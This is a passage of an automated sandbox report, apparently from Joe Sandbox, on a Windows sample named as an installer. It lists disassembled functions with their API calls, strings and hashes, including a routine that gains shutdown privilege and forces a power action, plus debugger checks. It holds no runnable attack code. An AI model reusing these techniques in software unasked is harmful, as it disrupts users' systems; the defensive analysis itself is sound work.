                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: __wsopen_s
                                      • String ID:
                                      • API String ID: 3347428461-0
                                      • Opcode ID: a1fdb9f93033f085445b77c130aa40affd646018561b3965a5a432394c234c7b
                                      • Instruction ID: 3d9f05f155115f1ef614ec9ce915c55361f4784c5681ee228c098efa594bcba8
                                      • Opcode Fuzzy Hash: a1fdb9f93033f085445b77c130aa40affd646018561b3965a5a432394c234c7b
                                      • Instruction Fuzzy Hash: 72116671A0424AAFCB05CF59E9449DF3BF8EF48308F1444A9F818AB311D670E911CBA5
                                      Function 6CB876EE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: _free
                                      • String ID:
                                      • API String ID: 269201875-0
                                      • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                      • Instruction ID: 03cb539007bbe1395cbc546aac5b84fe1b167be174e8713652430634b9e30acd
                                      • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                      • Instruction Fuzzy Hash: 17014F72D0119AAFCF019FA88C00AEE7FB5EF18218F144165FD24F2650E7718A24DB91
                                      Function 6CB87B47 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,00000000,?,6CB87805,?,?,00000000,?,6CB87805,00000000,0000000C), ref: 6CB87B64
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: 4a1057e02098c2080f41aa6b3cd098486acc6b51ecb94ceda0f289ae1cfc5ef7
                                      • Instruction ID: acc55e5fd39bbba67b28dea27f2796328a867489d646e2be3cbf24eaf524251a
                                      • Opcode Fuzzy Hash: 4a1057e02098c2080f41aa6b3cd098486acc6b51ecb94ceda0f289ae1cfc5ef7
                                      • Instruction Fuzzy Hash: 22D06C3210014DBBDF028F84DD06EDA3BAAFB49715F014000BA1866020C772E861AB94
                                      Function 6CA383A0 Relevance: 1.5, APIs: 1, Instructions: 1COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                      • Instruction ID: b6fde1bec8d56d1f1e1dcd38c558eabe520a6f84e0b2f2bec81005eb98f2e1c2
                                      • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                      • Instruction Fuzzy Hash:

                                      Non-executed Functions

                                      Function 6CBB6092 Relevance: 21.8, APIs: 5, Strings: 6, Instructions: 2537COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBB6097
                                        • Part of subcall function 6CBB91D6: __EH_prolog.LIBCMT ref: 6CBB91DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: $ $*$0UJ$@$@
                                      • API String ID: 3519838083-862571645
                                      • Opcode ID: e22172b2180ba6d381767f152ec73fcbe70747ea8cb959dd0ada97f8ed321326
                                      • Instruction ID: 471a6aeb5d2cc6b82704da2fd8e75ead187c61164f8f02bbcdd51b459a817a8f
                                      • Opcode Fuzzy Hash: e22172b2180ba6d381767f152ec73fcbe70747ea8cb959dd0ada97f8ed321326
                                      • Instruction Fuzzy Hash: B9333930D002999BDF15DFA4C890BEDBBB1EF55308F1080A9E449BBA51DB719E89CF52
                                      Function 6CC0889F Relevance: 15.6, APIs: 6, Strings: 2, Instructions: 1591COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CC088A4
                                      • __aulldiv.LIBCMT ref: 6CC08C4A
                                      • __aulldiv.LIBCMT ref: 6CC08C78
                                      • __aulldiv.LIBCMT ref: 6CC08D18
                                        • Part of subcall function 6CC0A36D: __EH_prolog.LIBCMT ref: 6CC0A372
                                        • Part of subcall function 6CC0A40E: __EH_prolog.LIBCMT ref: 6CC0A413
                                        • Part of subcall function 6CC09E78: __EH_prolog.LIBCMT ref: 6CC09E7D
                                        • Part of subcall function 6CC0424A: __EH_prolog.LIBCMT ref: 6CC0424F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog$__aulldiv
                                      • String ID: L$b
                                      • API String ID: 604474441-3566554212
                                      • Opcode ID: d9657c234f8b039fc43015c1601217ec1c14bdfa2872b48e6b05b85763b47a84
                                      • Instruction ID: bb1cb9dbd3bd3ebbb9460789cb05bc6bfeec81d956afeaf63ca2491728a01e41
                                      • Opcode Fuzzy Hash: d9657c234f8b039fc43015c1601217ec1c14bdfa2872b48e6b05b85763b47a84
                                      • Instruction Fuzzy Hash: 8CE28A30E05299DFCF15CFA4C990BDCBBB5AF15308F14819AD449A7B41EB326E89CB61
                                      Function 6CB64860 Relevance: 11.0, APIs: 3, Strings: 1, Instructions: 4048COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: C
                                      • API String ID: 4218353326-4157497815
                                      • Opcode ID: 079437087de6136148288acc1ae62cc2d30fa20031eeed00fa77cf8a695496c9
                                      • Instruction ID: 4ab700715c3826c1771386bea6edaf50c2d9e967976c5c0362e20f61c88768ff
                                      • Opcode Fuzzy Hash: 079437087de6136148288acc1ae62cc2d30fa20031eeed00fa77cf8a695496c9
                                      • Instruction Fuzzy Hash: F973F471644B418FC728CF2AC8D0A96B3F2EF953187198B6DC09787E95EB74B54ACB40
                                      Function 6CB69450 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 31nativeshutdownCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 6CB6945A
                                      • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6CB69466
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6CB69474
                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6CB6949B
                                      • NtInitiatePowerAction.NTDLL ref: 6CB694AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                      • String ID: SeShutdownPrivilege
                                      • API String ID: 3256374457-3733053543
                                      • Opcode ID: e62701cd68cea30dc9a40c5524a385dd47038d6fca2241438d6a5dbf59c779bf
                                      • Instruction ID: 7bca3e9f5cbeb21909586756be20d404e9bd13283d9f4b90af9cddf442597b4f
                                      • Opcode Fuzzy Hash: e62701cd68cea30dc9a40c5524a385dd47038d6fca2241438d6a5dbf59c779bf
                                      • Instruction Fuzzy Hash: 60F05B706453047BE6006F25CE0EBAA7BB4EF45701F004958F945971D1D770A994DB92
                                      Function 6C9E1950 Relevance: 9.3, APIs: 2, Strings: 3, Instructions: 594COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \j`7$\j`7$j
                                      • API String ID: 0-3644614255
                                      • Opcode ID: 718ab6eea95bba6659085bcdcf09c4864dd31129e1cac34ee6c0e6e7f65ac399
                                      • Instruction ID: 7315c284d44eca6b86ed36a700b4dae80733831c792335c14712d84dd6244dc0
                                      • Opcode Fuzzy Hash: 718ab6eea95bba6659085bcdcf09c4864dd31129e1cac34ee6c0e6e7f65ac399
                                      • Instruction Fuzzy Hash: 004224746093828FCB25CF68D48066ABBE1BFEA354F244A1EE499C7762D334D845CB53
                                      Function 6CBFB4AC Relevance: 8.7, APIs: 1, Strings: 3, Instructions: 1656COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBFB4B1
                                        • Part of subcall function 6CBFC93B: __EH_prolog.LIBCMT ref: 6CBFC940
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: 1$`)K$h)K
                                      • API String ID: 3519838083-3935664338
                                      • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                      • Instruction ID: e11cf8ddd8629e067c3e8305d35ef6ed2c24f47cb89700f9fa4f6b7b3da6d3ba
                                      • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                      • Instruction Fuzzy Hash: 8CF27B70904288DFDB21DBA8C884BDDBBB5EF49308F244499E459EB741DB719E8ACF11
                                      Function 6CBEDEEF Relevance: 8.3, APIs: 1, Strings: 2, Instructions: 3058COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBEDEF4
                                        • Part of subcall function 6CBF1622: __EH_prolog.LIBCMT ref: 6CBF1627
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: $h%K
                                      • API String ID: 3519838083-1737110039
                                      • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                      • Instruction ID: a0253bf370790fb28637e957a95a31b3d6de02a4750f00b0ec4f4a11773762e1
                                      • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                      • Instruction Fuzzy Hash: 29537730901298DFDF15CBA4C994BEDBBB4AF09308F2440D9D459A7791DB70AE8ACF52
                                      Function 6CBC9CE0 Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1923COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBC9CE5
                                        • Part of subcall function 6CB9FC2A: __EH_prolog.LIBCMT ref: 6CB9FC2F
                                        • Part of subcall function 6CBA16A6: __EH_prolog.LIBCMT ref: 6CBA16AB
                                        • Part of subcall function 6CBC9A0E: __EH_prolog.LIBCMT ref: 6CBC9A13
                                        • Part of subcall function 6CBC9837: __EH_prolog.LIBCMT ref: 6CBC983C
                                        • Part of subcall function 6CBCD143: __EH_prolog.LIBCMT ref: 6CBCD148
                                        • Part of subcall function 6CBCD143: ctype.LIBCPMT ref: 6CBCD16C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog$ctype
                                      • String ID:
                                      • API String ID: 1039218491-3916222277
                                      • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                      • Instruction ID: a35e37952689e0e125f2cf0b8d58ec2337a738f0f0dacc22ee72c51ff458c21a
                                      • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                      • Instruction Fuzzy Hash: FE039C30A052D8DFDF15DFA4C890BECBBB0AF16308F1440A9D44967691DB74AA89DF63
                                      Function 6CBF3A52 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1212COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: W
                                      • API String ID: 3519838083-655174618
                                      • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                      • Instruction ID: 1c095148765ad5641f372a8b84e56950135e064981b3ce96f87ec8e708130111
                                      • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                      • Instruction Fuzzy Hash: 1EB27A74A01299DFDB01CFA8C584B9EBBB4EF09308F244099E865EB741C775D94ACF62
                                      Function 6CB73871 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6CB73969
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6CB73973
                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6CB73980
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                      • String ID:
                                      • API String ID: 3906539128-0
                                      • Opcode ID: ecb1efac2f4f65c5deca33864bbaa0f9542fc986b7d16cae4729d94bf2c42afe
                                      • Instruction ID: 44e2c0cc3b0cb7706962856b4f99c4a91d945f3498da86b9dc12cecd3fa4e249
                                      • Opcode Fuzzy Hash: ecb1efac2f4f65c5deca33864bbaa0f9542fc986b7d16cae4729d94bf2c42afe
                                      • Instruction Fuzzy Hash: 6131E4759012289BCB21DF65D988BCDBBF8FF08314F5041EAE81CA7650EB709B858F55
                                      Function 6CB7286D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,6CB72925,?,?,?,?), ref: 6CB7288F
                                      • TerminateProcess.KERNEL32(00000000,?,6CB72925,?,?,?,?), ref: 6CB72896
                                      • ExitProcess.KERNEL32 ref: 6CB728A8
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      • Opcode ID: bea96464e22ef60401098293ba0c6f54643e77a31c844df997d6507c0d1f1e40
                                      • Instruction ID: 51d3fb55f0fcdb1afb5328235721f7aa3fc3b16ea416add845ac23100fbd4e30
                                      • Opcode Fuzzy Hash: bea96464e22ef60401098293ba0c6f54643e77a31c844df997d6507c0d1f1e40
                                      • Instruction Fuzzy Hash: F1E04F31100144EBCF116F50C90CA5C3BB8FF46746B104414F82497520CB76E981CB95
                                      Function 6CBE25EC Relevance: 4.5, APIs: 1, Strings: 1, Instructions: 995COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-3916222277
                                      • Opcode ID: 6283ffce90d7722d82f06bf6062908a4dbdb23c6aa848be1631664cf1bbb550b
                                      • Instruction ID: 0cef9225e316b4c73021221a7ba8f26a19a5062a6a352e47ebb2d81e2377284c
                                      • Opcode Fuzzy Hash: 6283ffce90d7722d82f06bf6062908a4dbdb23c6aa848be1631664cf1bbb550b
                                      • Instruction Fuzzy Hash: 06929E3090129ADFDB04CFA8C858BEEBBB0FF09748F244199E815AB751CB75AD45CB52
                                      Function 6CBF4F11 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 511COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-3916222277
                                      • Opcode ID: bf6cc7e3d5e08887c52fb4d73b2e2a9274b9cdfd61b6f8eb1b64b386a2eecc6f
                                      • Instruction ID: 866745d06116978b8aa91cd2f8e55c5a72cd3fdca2c72764f7196bb94e70c5cb
                                      • Opcode Fuzzy Hash: bf6cc7e3d5e08887c52fb4d73b2e2a9274b9cdfd61b6f8eb1b64b386a2eecc6f
                                      • Instruction Fuzzy Hash: EA225A70A002499FDB04CFA8C494BADBBF0FF48308F108569E8699B751D775E94ACF94
                                      Function 6CBE7896 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 333COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 6CBE789B
                                        • Part of subcall function 6CBE8FC9: __EH_prolog.LIBCMT ref: 6CBE8FCE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: @ K
                                      • API String ID: 3519838083-4216449128
                                      • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                      • Instruction ID: 1d17b408506dd66e121e2b0696b207827a0d1c28c0a1b8657d2c62048594920c
                                      • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                      • Instruction Fuzzy Hash: 56D10230D002949FDB14CFA4C490BDDB7B6FF88B98F24816AD405BBB86C7B09945CB52
                                      Function 6CB9BEA1 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CB9B000, based on PE: true
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID: x=J
                                      • API String ID: 3519838083-1497497802
                                      • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                      • Instruction ID: fc3430653d326190363a9e7423452f7e117102ef00920ef77224013f091b98d5
